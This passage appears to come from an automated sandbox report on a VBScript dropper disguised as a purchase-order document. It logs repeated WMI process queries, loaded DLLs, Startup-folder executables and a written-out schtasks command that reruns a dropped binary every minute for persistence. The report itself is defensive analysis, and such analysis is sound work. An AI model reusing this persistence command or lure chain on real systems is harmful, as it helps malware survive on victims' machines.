                                Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_update.exe'
                                Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_update.exe'
                                Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_update.exe'
                                Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_update.exe'
                                Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_update.exe'
                                Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_update.exe'
                                Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_update.exe'
                                Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_update.exe'
                                Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_update.exe'
                                Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_update.exe'
                                Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_update.exe'
                                Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_update.exe'
                                Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_update.exe'
                                Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_update.exe'
                                Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_update.exe'
                                Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_update.exe'
                                Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_update.exe'
                                Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_update.exe'
                                Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_update.exe'
                                Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_update.exe'
                                Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_update.exe'
                                Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_update.exe'
                                Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_update.exe'
                                Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_update.exe'
                                Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_update.exe'
                                Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_update.exe'
                                Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_update.exe'
                                Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_update.exe'
                                Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_update.exe'
                                Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_update.exe'
                                Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_update.exe'
                                Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_update.exe'
                                Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_update.exe'
                                Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_update.exe'
                                Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_update.exe'
                                Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_update.exe'
                                Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_update.exe'
                                Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_update.exe'
                                Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_update.exe'
                                Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_update.exe'
                                Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_update.exe'
                                Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_update.exe'
                                Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_update.exe'
                                Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_update.exe'
                                Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_update.exe'
                                Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_update.exe'
                                Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_update.exe'
                                Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_update.exe'
                                Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_update.exe'
                                Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_update.exe'
                                Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_update.exe'
                                Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_update.exe'
                                Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_update.exe'
                                Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_update.exe'
                                Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_update.exe'
                                Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_update.exe'
                                Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_update.exe'
                                Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_update.exe'
                                Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_update.exe'
                                Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_update.exe'
                                Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_update.exe'
                                Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_update.exe'
                                Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_update.exe'
                                Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_update.exe'
                                Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_update.exe'
                                Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_update.exe'
                                Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_update.exe'
                                Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_update.exe'
                                Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_update.exe'
                                Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_update.exe'
                                Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_update.exe'
                                Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_update.exe'
                                Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_update.exe'
                                Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_update.exe'
                                Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_update.exe'
                                Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_update.exe'
                                Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_update.exe'
                                Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_update.exe'
                                Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_update.exe'
                                Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_update.exe'
                                Source: C:\Windows\System32\wscript.exeFile read: C:\Users\desktop.iniJump to behavior
                                Source: C:\Windows\System32\wscript.exeKey opened: HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
                                Source: Purchase Order No. G02873362-Docx.vbsVirustotal: Detection: 37%
                                Source: Purchase Order No. G02873362-Docx.vbsReversingLabs: Detection: 28%
                                Source: unknownProcess created: C:\Windows\System32\wscript.exe C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\Purchase Order No. G02873362-Docx.vbs"
                                Source: C:\Windows\System32\wscript.exeProcess created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\update.exe "C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\update.exe"
                                Source: unknownProcess created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\update.exe "C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\update.exe"
                                Source: unknownProcess created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\update.exe "C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\update.exe"
                                Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\update.exeProcess created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\._cache_update.exe "C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\._cache_update.exe"
                                Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\update.exeProcess created: C:\ProgramData\Synaptics\Synaptics.exe "C:\ProgramData\Synaptics\Synaptics.exe" InjUpdate
                                Source: unknownProcess created: C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXE "C:\Program Files (x86)\Microsoft Office\Root\Office16\EXCEL.EXE" /automation -Embedding
                                Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\._cache_update.exeProcess created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /c schtasks /create /tn VFNCBO.exe /tr C:\Users\user\AppData\Roaming\Windata\NUHORT.exe /sc minute /mo 1
                                Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\._cache_update.exeProcess created: C:\Windows\SysWOW64\wscript.exe WSCript C:\Users\user\AppData\Local\Temp\VFNCBO.vbs
                                Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\schtasks.exe schtasks /create /tn VFNCBO.exe /tr C:\Users\user\AppData\Roaming\Windata\NUHORT.exe /sc minute /mo 1
                                Source: unknownProcess created: C:\Users\user\AppData\Roaming\Windata\NUHORT.exe C:\Users\user\AppData\Roaming\Windata\NUHORT.exe
                                Source: unknownProcess created: C:\Users\user\AppData\Roaming\Windata\NUHORT.exe "C:\Users\user\AppData\Roaming\Windata\NUHORT.exe"
                                Source: unknownProcess created: C:\ProgramData\Synaptics\Synaptics.exe "C:\ProgramData\Synaptics\Synaptics.exe"
                                Source: unknownProcess created: C:\Users\user\AppData\Roaming\Windata\NUHORT.exe "C:\Users\user\AppData\Roaming\Windata\NUHORT.exe"
                                Source: unknownProcess created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\._cache_update.exe "C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\._cache_update.exe"
                                Source: unknownProcess created: C:\Users\user\AppData\Roaming\Windata\NUHORT.exe "C:\Users\user\AppData\Roaming\Windata\NUHORT.exe"
                                Source: unknownProcess created: C:\Users\user\AppData\Roaming\Windata\NUHORT.exe C:\Users\user\AppData\Roaming\Windata\NUHORT.exe
                                Source: unknownProcess created: C:\Users\user\AppData\Roaming\Windata\NUHORT.exe C:\Users\user\AppData\Roaming\Windata\NUHORT.exe
                                Source: C:\Windows\System32\wscript.exeProcess created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\update.exe "C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\update.exe"Jump to behavior
                                Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\update.exeProcess created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\._cache_update.exe "C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\._cache_update.exe" Jump to behavior
                                Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\update.exeProcess created: C:\ProgramData\Synaptics\Synaptics.exe "C:\ProgramData\Synaptics\Synaptics.exe" InjUpdateJump to behavior
                                Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\._cache_update.exeProcess created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /c schtasks /create /tn VFNCBO.exe /tr C:\Users\user\AppData\Roaming\Windata\NUHORT.exe /sc minute /mo 1Jump to behavior
                                Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\._cache_update.exeProcess created: C:\Windows\SysWOW64\wscript.exe WSCript C:\Users\user\AppData\Local\Temp\VFNCBO.vbsJump to behavior
                                Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\schtasks.exe schtasks /create /tn VFNCBO.exe /tr C:\Users\user\AppData\Roaming\Windata\NUHORT.exe /sc minute /mo 1
                                Source: C:\Windows\System32\wscript.exeSection loaded: version.dllJump to behavior
                                Source: C:\Windows\System32\wscript.exeSection loaded: kernel.appcore.dllJump to behavior
                                Source: C:\Windows\System32\wscript.exeSection loaded: uxtheme.dllJump to behavior
                                Source: C:\Windows\System32\wscript.exeSection loaded: sxs.dllJump to behavior
                                Source: C:\Windows\System32\wscript.exeSection loaded: vbscript.dllJump to behavior
                                Source: C:\Windows\System32\wscript.exeSection loaded: amsi.dllJump to behavior
                                Source: C:\Windows\System32\wscript.exeSection loaded: userenv.dllJump to behavior
                                Source: C:\Windows\System32\wscript.exeSection loaded: profapi.dllJump to behavior
                                Source: C:\Windows\System32\wscript.exeSection loaded: wldp.dllJump to behavior
                                Source: C:\Windows\System32\wscript.exeSection loaded: msasn1.dllJump to behavior
                                Source: C:\Windows\System32\wscript.exeSection loaded: cryptsp.dllJump to behavior
                                Source: C:\Windows\System32\wscript.exeSection loaded: rsaenh.dllJump to behavior
                                Source: C:\Windows\System32\wscript.exeSection loaded: cryptbase.dllJump to behavior
                                Source: C:\Windows\System32\wscript.exeSection loaded: msisip.dllJump to behavior
                                Source: C:\Windows\System32\wscript.exeSection loaded: wshext.dllJump to behavior
                                Source: C:\Windows\System32\wscript.exeSection loaded: scrobj.dllJump to behavior
                                Source: C:\Windows\System32\wscript.exeSection loaded: mpr.dllJump to behavior
                                Source: C:\Windows\System32\wscript.exeSection loaded: scrrun.dllJump to behavior
                                Source: C:\Windows\System32\wscript.exeSection loaded: windows.storage.dllJump to behavior
                                Source: C:\Windows\System32\wscript.exeSection loaded: propsys.dllJump to behavior
                                Source: C:\Windows\System32\wscript.exeSection loaded: msxml3.dllJump to behavior
                                Source: C:\Windows\System32\wscript.exeSection loaded: msdart.dllJump to behavior
                                Source: C:\Windows\System32\wscript.exeSection loaded: wininet.dllJump to behavior
                                Source: C:\Windows\System32\wscript.exeSection loaded: iertutil.dllJump to behavior
                                Source: C:\Windows\System32\wscript.exeSection loaded: mlang.dllJump to behavior
                                Source: C:\Windows\System32\wscript.exeSection loaded: urlmon.dllJump to behavior
                                Source: C:\Windows\System32\wscript.exeSection loaded: srvcli.dllJump to behavior
                                Source: C:\Windows\System32\wscript.exeSection loaded: netutils.dllJump to behavior
                                Source: C:\Windows\System32\wscript.exeSection loaded: sspicli.dllJump to behavior
                                Source: C:\Windows\System32\wscript.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
                                Source: C:\Windows\System32\wscript.exeSection loaded: winhttp.dllJump to behavior
                                Source: C:\Windows\System32\wscript.exeSection loaded: mswsock.dllJump to behavior
                                Source: C:\Windows\System32\wscript.exeSection loaded: iphlpapi.dllJump to behavior
                                Source: C:\Windows\System32\wscript.exeSection loaded: winnsi.dllJump to behavior
                                Source: C:\Windows\System32\wscript.exeSection loaded: dnsapi.dllJump to behavior
                                Source: C:\Windows\System32\wscript.exeSection loaded: rasadhlp.dllJump to behavior
                                Source: C:\Windows\System32\wscript.exeSection loaded: fwpuclnt.dllJump to behavior
                                Source: C:\Windows\System32\wscript.exeSection loaded: schannel.dllJump to behavior
                                Source: C:\Windows\System32\wscript.exeSection loaded: mskeyprotect.dllJump to behavior
                                Source: C:\Windows\System32\wscript.exeSection loaded: ntasn1.dllJump to behavior
                                Source: C:\Windows\System32\wscript.exeSection loaded: dpapi.dllJump to behavior
                                Source: C:\Windows\System32\wscript.exeSection loaded: gpapi.dllJump to behavior
                                Source: C:\Windows\System32\wscript.exeSection loaded: ncrypt.dllJump to behavior
                                Source: C:\Windows\System32\wscript.exeSection loaded: ncryptsslp.dllJump to behavior
                                Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\update.exeSection loaded: apphelp.dllJump to behavior
                                Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\update.exeSection loaded: acgenral.dllJump to behavior
                                Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\update.exeSection loaded: uxtheme.dllJump to behavior
                                Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\update.exeSection loaded: winmm.dllJump to behavior
                                Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\update.exeSection loaded: samcli.dllJump to behavior
                                Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\update.exeSection loaded: msacm32.dllJump to behavior
                                Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\update.exeSection loaded: version.dllJump to behavior
                                Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\update.exeSection loaded: userenv.dllJump to behavior
                                Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\update.exeSection loaded: dwmapi.dllJump to behavior
                                Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\update.exeSection loaded: urlmon.dllJump to behavior
                                Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\update.exeSection loaded: mpr.dllJump to behavior
                                Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\update.exeSection loaded: sspicli.dllJump to behavior
                                Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\update.exeSection loaded: winmmbase.dllJump to behavior
                                Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\update.exeSection loaded: winmmbase.dllJump to behavior
                                Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\update.exeSection loaded: iertutil.dllJump to behavior
                                Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\update.exeSection loaded: srvcli.dllJump to behavior
                                Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\update.exeSection loaded: netutils.dllJump to behavior
                                Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\update.exeSection loaded: aclayers.dllJump to behavior
                                Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\update.exeSection loaded: sfc.dllJump to behavior
                                Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\update.exeSection loaded: sfc_os.dllJump to behavior
                                Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\update.exeSection loaded: wininet.dllJump to behavior
                                Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\update.exeSection loaded: wsock32.dllJump to behavior
                                Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\update.exeSection loaded: netapi32.dllJump to behavior
                                Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\update.exeSection loaded: windows.storage.dllJump to behavior
                                Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\update.exeSection loaded: wldp.dllJump to behavior
                                Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\update.exeSection loaded: kernel.appcore.dllJump to behavior
                                Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\update.exeSection loaded: textshaping.dllJump to behavior
                                Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\update.exeSection loaded: propsys.dllJump to behavior
                                Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\update.exeSection loaded: profapi.dllJump to behavior
                                Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\update.exeSection loaded: twext.dllJump to behavior
                                Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\update.exeSection loaded: windows.staterepositoryps.dllJump to behavior
                                Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\update.exeSection loaded: appresolver.dllJump to behavior
                                Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\update.exeSection loaded: bcp47langs.dllJump to behavior
                                Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\update.exeSection loaded: slc.dllJump to behavior
                                Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\update.exeSection loaded: sppc.dllJump to behavior
                                Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\update.exeSection loaded: policymanager.dllJump to behavior
                                Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\update.exeSection loaded: msvcp110_win.dllJump to behavior
                                Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\update.exeSection loaded: ntshrui.dllJump to behavior
                                Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\update.exeSection loaded: windows.fileexplorer.common.dllJump to behavior
                                Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\update.exeSection loaded: cscapi.dllJump to behavior
                                Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\update.exeSection loaded: twinapi.appcore.dllJump to behavior
                                Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\update.exeSection loaded: shacct.dllJump to behavior
                                Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\update.exeSection loaded: idstore.dllJump to behavior
                                Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\update.exeSection loaded: samlib.dllJump to behavior
                                Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\update.exeSection loaded: wlidprov.dllJump to behavior
                                Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\update.exeSection loaded: provsvc.dllJump to behavior
                                Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\update.exeSection loaded: starttiledata.dllJump to behavior
                                Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\update.exeSection loaded: acppage.dllJump to behavior
                                Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\update.exeSection loaded: msi.dllJump to behavior
                                Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\update.exeSection loaded: aepic.dllJump to behavior
                                Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\update.exeSection loaded: ntmarta.dllJump to behavior
                                Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\update.exeSection loaded: cryptsp.dllJump to behavior
                                Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\update.exeSection loaded: edputil.dllJump to behavior
                                Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\update.exeSection loaded: wintypes.dllJump to behavior
                                Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\update.exeSection loaded: onecorecommonproxystub.dllJump to behavior
                                Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\update.exeSection loaded: onecoreuapcommonproxystub.dllJump to behavior
                                Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\update.exeSection loaded: ntmarta.dllJump to behavior
                                Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\update.exeSection loaded: twext.dllJump to behavior
